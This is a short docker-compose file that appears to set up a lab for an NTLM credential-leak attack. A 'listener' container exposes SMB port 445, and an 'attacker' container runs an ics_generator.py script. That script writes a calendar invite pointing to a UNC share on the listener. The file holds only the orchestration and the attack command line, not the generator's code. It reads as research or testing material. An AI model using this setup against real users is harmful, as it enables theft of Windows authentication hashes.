version: "3.9"

services:
  listener:
    build: ./listener
    container_name: ntlm-listener
    ports:
      - "445:445"
      - "80:8080"
    volumes:
      - ./artifacts:/artifacts
  attacker:
    build: ./attacker
    container_name: ntlm-attacker
    volumes:
      - ./artifacts:/artifacts
    command: ["python", "/opt/ics_generator.py", "--output", "/artifacts/meeting.ics", "--target", "\\\\ntlm-listener\\share\\alert"]
    depends_on:
      - listener
